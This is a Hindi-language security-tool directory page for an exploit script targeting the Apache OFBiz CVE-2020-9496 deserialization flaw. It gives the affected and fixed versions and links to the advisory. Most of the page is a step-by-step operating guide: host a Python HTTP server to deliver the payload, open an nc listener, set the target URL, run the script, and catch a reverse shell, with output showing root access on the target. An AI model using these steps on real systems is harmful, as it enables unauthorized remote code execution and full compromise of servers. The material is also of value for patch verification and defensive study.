Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/s4dbrd/cve-2020-9496
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubs4dbrd/cve-2020-9496

CVE-2020-9496

Apache OFBiz CVE-2020-9496 असुरक्षित डिसीरियलाइज़ेशन भेद्यता के लिए एक्सप्लॉइट स्क्रिप्ट, जो रिवर्स शेल पेलोड डिलीवरी सहित क्राफ्टेड XML-RPC अनुरोधों के माध्यम से रिमोट कोड निष्पादन को सक्षम बनाती है।

रिपॉजिटरी देखें
45 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2020-9496

चूंकि वेबटूल्स में 2 xmlrpc से संबंधित अनुरोध (xmlrpc और ping) प्रमाणीकरण का उपयोग नहीं कर रहे हैं, वे असुरक्षित डिसीरियलाइज़ेशन के लिए संवेदनशील हैं।
यह समस्या GitHub Security Lab टीम के Alvaro Munoz [email protected] द्वारा सुरक्षा टीम को सूचित की गई थी।

प्रभावित संस्करण 17.12.01

सुधारित संस्करण 18.12.01, 17.12.04

मूल ब्लॉग: https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz/
Apache का पोस्ट: https://issues.apache.org/jira/browse/OFBIZ-11716
Github का POC: https://github.com/g33xter/CVE-2020-9496

इस एक्सप्लॉइट को काम करने के लिए, आपको निम्नलिखित चरणों का पालन करना होगा:

चरण 1: python3 के साथ HTTP सेवा होस्ट करें

root@kitploit:~
> sudo python3 -m http.server 80

चरण 2: वांछित पोर्ट पर nc लिसनर चलाएँ (अनुशंसित 8001)

root@kitploit:~
> nc -nlvp 8001

चरण 3: स्क्रिप्ट के अंदर वेबसाइट का URL और पोर्ट बदलें:

root@kitploit:~
url='https://127.0.0.1' # CHANGE THIS                                                         
port=8443 # CHANGE THIS

चरण 4: नीचे दिखाए अनुसार एक्सप्लॉइट चलाएँ

root@kitploit:~
> ./cve-2020-9496.sh -i IP -p PORT

चरण 5: nc लिसनर जाँचें

root@kitploit:~
❯ nc -nlvp 8001
listening on [any] 8001 ...
connect to [10.10.x.x] from (UNKNOWN) [10.10.x.x] 57500
bash: cannot set terminal process group (31): Inappropriate ioctl for device
bash: no job control in this shell
root@poc:/usr/src/apache-ofbiz-17.12.01# id
id
uid=0(root) gid=0(root) groups=0(root)
root@poc:/usr/src/apache-ofbiz-17.12.01# 
टूल डाउनलोड करें